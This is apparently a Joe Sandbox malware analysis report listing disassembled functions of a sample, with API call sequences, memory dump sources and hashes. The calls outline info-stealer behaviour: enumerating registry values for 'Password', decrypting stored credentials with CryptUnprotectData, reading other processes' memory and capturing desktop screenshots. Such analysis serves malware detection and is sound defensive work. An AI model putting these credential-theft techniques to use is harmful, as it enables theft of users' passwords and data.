                                                        • Part of subcall function 02C97657: lstrcpy.KERNEL32(00000000,ERROR), ref: 02C97675
                                                      • RegOpenKeyExA.ADVAPI32(?,00638D44,00000000,00020019,?), ref: 02C93BF4
                                                      • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02C93C2E
                                                      • wsprintfA.USER32 ref: 02C93C59
                                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 02C93C77
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93C85
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93C8F
                                                      • RegQueryValueExA.ADVAPI32(?,00638DC0,00000000,000F003F,?,?), ref: 02C93CD8
                                                      • lstrlen.KERNEL32(?), ref: 02C93CED
                                                      • RegQueryValueExA.ADVAPI32(?,00638BD0,00000000,000F003F,?,00000400), ref: 02C93D5E
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93DA9
                                                      • RegCloseKey.ADVAPI32(?), ref: 02C93DC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                                                      • String ID: - $?
                                                      • API String ID: 13140697-712516993
                                                      • Opcode ID: b62d206b9e23e30b0fb799a6e291ddc077a55a8e51b40d8956c223b173a496a6
                                                      • Instruction ID: 62ea69fbb349c53a8b3eeeae4280ff0e31f39a8b5a50dbf37b25519077b66a83
                                                      • Opcode Fuzzy Hash: b62d206b9e23e30b0fb799a6e291ddc077a55a8e51b40d8956c223b173a496a6
                                                      • Instruction Fuzzy Hash: BA9160B29002499FCF10DF98DD889EEB7BAFF88314F1581A9E509A7250D7319E45CF90
                                                      Function 004077D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407805
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040784A
                                                      • strlen.MSVCRT ref: 0040787E
                                                      • StrStrA.SHLWAPI(?,Password), ref: 004078B8
                                                      • strlen.MSVCRT ref: 0040794D
                                                        • Part of subcall function 00407750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040775E
                                                        • Part of subcall function 00407750: HeapAlloc.KERNEL32(00000000), ref: 00407765
                                                        • Part of subcall function 00407750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040778D
                                                        • Part of subcall function 00407750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004077AD
                                                        • Part of subcall function 00407750: LocalFree.KERNEL32(?), ref: 004077B7
                                                      • strcpy_s.MSVCRT ref: 004078E1
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004078EC
                                                      • HeapFree.KERNEL32(00000000), ref: 004078F3
                                                      • strlen.MSVCRT ref: 00407900
                                                      • strcpy_s.MSVCRT ref: 0040792A
                                                      • strlen.MSVCRT ref: 00407974
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407A35
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID: Password
                                                      • API String ID: 3893107980-3434357891
                                                      • Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction ID: faa8cd0a279a4eff08d681149dd2f2cc35a0fe7e2d41fdb8b82cccc84e003d60
                                                      • Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction Fuzzy Hash: 1581ECB1D0021DAFDB10DF95DC84ADEBBB9EF48300F10416AE509B7250EB75AA85CFA5
                                                      Function 02C91A97 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 02C91AD8
                                                      • lstrcpy.KERNEL32(00000000,00638C44), ref: 02C91B03
                                                      • lstrlen.KERNEL32(?), ref: 02C91B10
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91B2D
                                                      • lstrcat.KERNEL32(00000000,?), ref: 02C91B3B
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91B61
                                                      • lstrlen.KERNEL32(00638AA8), ref: 02C91B76
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C91B99
                                                      • lstrcat.KERNEL32(00000000,00638AA8), ref: 02C91BA1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C91BC9
                                                      • ShellExecuteEx.SHELL32(?), ref: 02C91C04
                                                      • ExitProcess.KERNEL32 ref: 02C91C3A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                                      • String ID: <
                                                      • API String ID: 3579039295-4251816714
                                                      • Opcode ID: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                                                      • Instruction ID: ea3ad6b5b1359803a729766cf9bdea6e35e850b4eead8d6073c8098f9ab595e2
                                                      • Opcode Fuzzy Hash: d8a4b448b3cbd2fec1d6e41789f4e9dc9c9ba109b5cf32146fe5b58423eccd26
                                                      • Instruction Fuzzy Hash: A05197B190161A9FDB10DF79CC84A9DBBFBAF84304F045125E905E3250EB709B05DF90
                                                      Function 0041F190 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F1C4
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 0041F1F2
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F206
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F215
                                                      • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F233
                                                      • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F261
                                                      • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F274
                                                      • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F286
                                                      • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F6EB), ref: 0041F292
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F2DF
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F31F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                      • String ID: ERROR
                                                      • API String ID: 2137491262-2861137601
                                                      • Opcode ID: e7680c11a91e8b6c3c8f82bef7fa201e94bd7553147c415b9cb206c114ce16cc
                                                      • Instruction ID: 9abe9f8fe7dca6ffdbab36a4153b7e44e04b96eb82d1d181ed6394daf58576c4
                                                      • Opcode Fuzzy Hash: e7680c11a91e8b6c3c8f82bef7fa201e94bd7553147c415b9cb206c114ce16cc
                                                      • Instruction Fuzzy Hash: FF51A235B101059FCB21AB39CD49AAB77A5AF94304F04517AFC0AEB391DF78DC468B98
                                                      Function 02C8F3F7 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F42B
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8F459
                                                      • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 02C8F46D
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F47C
                                                      • LocalAlloc.KERNEL32(00000040,00000001), ref: 02C8F49A
                                                      • StrStrA.SHLWAPI(00000000,?), ref: 02C8F4C8
                                                      • lstrlen.KERNEL32(?), ref: 02C8F4DB
                                                      • strtok.MSVCRT(00000001,?), ref: 02C8F4ED
                                                      • lstrlen.KERNEL32(00000000), ref: 02C8F4F9
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F546
                                                      • lstrcpy.KERNEL32(00000000,ERROR), ref: 02C8F586
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                      • String ID: ERROR
                                                      • API String ID: 2137491262-2861137601
                                                      • Opcode ID: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
                                                      • Instruction ID: 415ec9f9a8a672f22d161015c0d33c8d60f250bf123c28e38491eb551c1ccc84
                                                      • Opcode Fuzzy Hash: 2c89e48d0b9b0eda821c55660e72daf3842d776b43c941ecb21aeec7c28ff561
                                                      • Instruction Fuzzy Hash: 5A51BE719006829FDB21BF38CC48AAE77E6EF94708F048518EC0ADBA10EB30DD41DB91
                                                      Function 0040A010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(02D8A5E0,00639BD8,0000FFFF), ref: 0040A026
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040A053
                                                      • lstrlenA.KERNEL32(00639BD8), ref: 0040A060
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A08A
                                                      • lstrlenA.KERNEL32(00434C54), ref: 0040A095
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0B2
                                                      • lstrcatA.KERNEL32(00000000,00434C54), ref: 0040A0BE
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A0E4
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A0EF
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A114
                                                      • SetEnvironmentVariableA.KERNEL32(02D8A5E0,00000000), ref: 0040A12F
                                                      • LoadLibraryA.KERNEL32(02D8E400), ref: 0040A143
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: 4fbcdc3098aad57f1cd1783f116feb515df0f54c487ac4daf38f2631b6e3f110
                                                      • Instruction ID: 16528322d234b40cf1fb76c3db849273f78afb20369f5d4540fba7c57ad762d2
                                                      • Opcode Fuzzy Hash: 4fbcdc3098aad57f1cd1783f116feb515df0f54c487ac4daf38f2631b6e3f110
                                                      • Instruction Fuzzy Hash: 90919F306007009FD7219FA5DC88AA736A6AB94705F40507AF905AB3E1EFBDDD508BDA
                                                      Function 02C7A277 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 02C7A28D
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C7A2BA
                                                      • lstrlen.KERNEL32(00639BD8), ref: 02C7A2C7
                                                      • lstrcpy.KERNEL32(00000000,00639BD8), ref: 02C7A2F1
                                                      • lstrlen.KERNEL32(00434C54), ref: 02C7A2FC
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A319
                                                      • lstrcat.KERNEL32(00000000,00434C54), ref: 02C7A325
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A34B
                                                      • lstrcat.KERNEL32(00000000,00000000), ref: 02C7A356
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C7A37B
                                                      • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 02C7A396
                                                      • LoadLibraryA.KERNEL32(00638D78), ref: 02C7A3AA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                      • String ID:
                                                      • API String ID: 2929475105-0
                                                      • Opcode ID: 0649521484773df5a13b860f02ca4509e53c992252372a3c91847646a3c61d7e
                                                      • Instruction ID: 7d9bce7ac0982688abb3ec8e7133f8d606e68796a5c8402bc58c3d58f48e448c
                                                      • Opcode Fuzzy Hash: 0649521484773df5a13b860f02ca4509e53c992252372a3c91847646a3c61d7e
                                                      • Instruction Fuzzy Hash: D191B371600B018FD7309F69DC88EAA37B7EB98709F545428F805876A1EBB5DA84CFD1
                                                      Function 0040BBF9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,Function_0002CFF4), ref: 0040BC1F
                                                      • lstrlenA.KERNEL32(00000000), ref: 0040BC52
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BC7C
                                                      • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BC84
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BCAC
                                                      • lstrlenA.KERNEL32(00434ADC), ref: 0040BD23
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen$lstrcat
                                                      • String ID:
                                                      • API String ID: 2500673778-0
                                                      • Opcode ID: 15e908f023ec14d2470523892675e38484664b3e87caaa26c26bfa6066537364
                                                      • Instruction ID: b199f1bc841aab2c8232b5e7ee7863f4fe3244599780bab2fc116af185a33c6c
                                                      • Opcode Fuzzy Hash: 15e908f023ec14d2470523892675e38484664b3e87caaa26c26bfa6066537364
                                                      • Instruction Fuzzy Hash: BAA14C30A012058FDB25DF69D949A9AB7B1EF44308F14807EE806A73E1DB79DC45CF98
                                                      Function 02C77A37 Relevance: 18.2, APIs: 12, Instructions: 202stringregistrymemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 02C77A6C
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 02C77AB1
                                                      • strlen.MSVCRT ref: 02C77AE5
                                                      • StrStrA.SHLWAPI(?,00434ACC), ref: 02C77B1F
                                                      • strlen.MSVCRT ref: 02C77BB4
                                                        • Part of subcall function 02C779B7: GetProcessHeap.KERNEL32(00000008,00000400), ref: 02C779C5
                                                        • Part of subcall function 02C779B7: RtlAllocateHeap.NTDLL(00000000), ref: 02C779CC
                                                        • Part of subcall function 02C779B7: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 02C779F4
                                                        • Part of subcall function 02C779B7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 02C77A14
                                                        • Part of subcall function 02C779B7: LocalFree.KERNEL32(?), ref: 02C77A1E
                                                      • strcpy_s.MSVCRT ref: 02C77B48
                                                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C77B53
                                                      • HeapFree.KERNEL32(00000000), ref: 02C77B5A
                                                      • strlen.MSVCRT ref: 02C77B67
                                                      • strcpy_s.MSVCRT ref: 02C77B91
                                                      • strlen.MSVCRT ref: 02C77BDB
                                                      • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 02C77C9C
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                                                      • String ID:
                                                      • API String ID: 225686516-0
                                                      • Opcode ID: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction ID: 4f190347833fa3df61891f402d221eb47b666a4d53d76485429eee8af5a74bff
                                                      • Opcode Fuzzy Hash: a782c05f9539c59e8af76601a36dab89cc6afff5db60a14075558c6cda0e2bef
                                                      • Instruction Fuzzy Hash: 88810EB1D0021DAFDB10DF94DC84ADEBBB9EF48304F10416AE509E7250EB759A89CFA5
                                                      Function 02C8EB67 Relevance: 18.2, APIs: 12, Instructions: 199stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 02C8EBB0
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8EBE6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8EBF4
                                                      • lstrcat.KERNEL32(?,00434F28), ref: 02C8EC0D
                                                      • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 02C8EC74
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8ECA6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8ECB4
                                                      • lstrcat.KERNEL32(?,00434F48), ref: 02C8ECCD
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02C8ED38
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8ED67
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8ED75
                                                      • lstrcat.KERNEL32(?,00434F5C), ref: 02C8ED8E
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: 5843268dbd2edd4dc5aafd7e10abc721456ae67d1da2c5d623e7279b1a6fa381
                                                      • Instruction ID: ad37b1cf9d4715d052036b377eac4fda74eec69c13fdc506ae07fdc0e70640bd
                                                      • Opcode Fuzzy Hash: 5843268dbd2edd4dc5aafd7e10abc721456ae67d1da2c5d623e7279b1a6fa381
                                                      • Instruction Fuzzy Hash: 25711771A40219ABD724EB70CC46FFC7775AF48700F1444A8BB19AB1C0DBB4AA888F95
                                                      Function 004182F0 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • strtok_s.MSVCRT ref: 00418313
                                                      • lstrlenA.KERNEL32(00000000,?), ref: 0041834C
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418383
                                                      • lstrlenA.KERNEL32(00000000), ref: 004183A0
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004183D7
                                                      • lstrlenA.KERNEL32(00000000), ref: 004183F4
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 0041842B
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418448
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00418477
                                                      • lstrlenA.KERNEL32(00000000), ref: 00418491
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 004184C0
                                                      • strtok_s.MSVCRT ref: 004184DA
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2248899859.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.2248899859.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000001.00000002.2248899859.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpylstrlen$strtok_s
                                                      • String ID:
                                                      • API String ID: 2211830134-0
                                                      • Opcode ID: 183aa32d808ee6f27ba62fd0f85c3f7f4d58a0c2ee848ca2d2c9c0a15d29561a
                                                      • Instruction ID: 95499b817d49597cc9983ae55311b2d172bb082af449739eeb68ab6ba4dfa549
                                                      • Opcode Fuzzy Hash: 183aa32d808ee6f27ba62fd0f85c3f7f4d58a0c2ee848ca2d2c9c0a15d29561a
                                                      • Instruction Fuzzy Hash: 9A514F71600612ABD7159F69D9486ABB7A5EF14340F104129EC06EB384EF78E991CBE4
                                                      Function 02C92837 Relevance: 16.7, APIs: 11, Instructions: 229stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • ??_U@YAPAXI@Z.MSVCRT(00064000,?,00000000), ref: 02C92848
                                                      • lstrcpy.KERNEL32(00000000,0042CFF4), ref: 02C92883
                                                      • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 02C92894
                                                      • memset.MSVCRT ref: 02C928BC
                                                      • ReadProcessMemory.KERNEL32(00000000,00000000,00000000,00000208,00000000), ref: 02C92913
                                                      • lstrlen.KERNEL32(00000000), ref: 02C92920
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 02C929A7
                                                      • lstrlen.KERNEL32(00000000), ref: 02C929AE
                                                      • strlen.MSVCRT ref: 02C929D2
                                                      • memset.MSVCRT ref: 02C92A5C
                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 02C92AA9
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Processlstrcpylstrlenmemset$MemoryOpenReadstrlen
                                                      • String ID:
                                                      • API String ID: 311138045-0
                                                      • Opcode ID: 443569c397842e3a8f93b2b0e7bca229e0905b769b4f9cefabd2c8eabcf3c0ba
                                                      • Instruction ID: ad527d42997487a3200dddc3273a239646bd857c77340eb535f03cb4fb3613b4
                                                      • Opcode Fuzzy Hash: 443569c397842e3a8f93b2b0e7bca229e0905b769b4f9cefabd2c8eabcf3c0ba
                                                      • Instruction Fuzzy Hash: 48819271E00209AFDF14CF94DC48BAEBBB6EF84314F148069D945A7280EB759A45CF96
                                                      Function 02C94657 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,02C91127), ref: 02C946ED
                                                      • GetDesktopWindow.USER32 ref: 02C946F7
                                                      • GetWindowRect.USER32(00000000,?), ref: 02C94704
                                                      • SelectObject.GDI32(00000000,00000000), ref: 02C94736
                                                      • GetHGlobalFromStream.COMBASE(02C91127,?), ref: 02C947AD
                                                      • GlobalLock.KERNEL32(?), ref: 02C947B7
                                                      • GlobalSize.KERNEL32(?), ref: 02C947C4
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2c70000_ED60.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                      • String ID:
                                                      • API String ID: 1264946473-0
                                                      • Opcode ID: 840f21f0a925c32e4b07566fcffe5bafd3990858c8fb6f6448a55fd2581d4987
                                                      • Instruction ID: 1603487f407bd4b50a52b1e803c0181f6f7761313a59373a33a03c4c6620427c
                                                      • Opcode Fuzzy Hash: 840f21f0a925c32e4b07566fcffe5bafd3990858c8fb6f6448a55fd2581d4987
                                                      • Instruction Fuzzy Hash: D0511BB5A00209AFDB14DFA4DD89EEEB7BAEF48304F104019F905A3250DB74AE45CFA1
                                                      Function 02C8E3E7 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • lstrcat.KERNEL32(?,00638B0C), ref: 02C8E454
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 02C8E47E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E4B6
                                                      • lstrcat.KERNEL32(?,00000000), ref: 02C8E4C4
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4DF
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E4F3
                                                      • lstrcat.KERNEL32(?,00638A84), ref: 02C8E507
                                                      • lstrcat.KERNEL32(?,?), ref: 02C8E51B
                                                      • lstrcat.KERNEL32(?,00638AC8), ref: 02C8E52E
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 02C8E566
                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 02C8E56D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: false
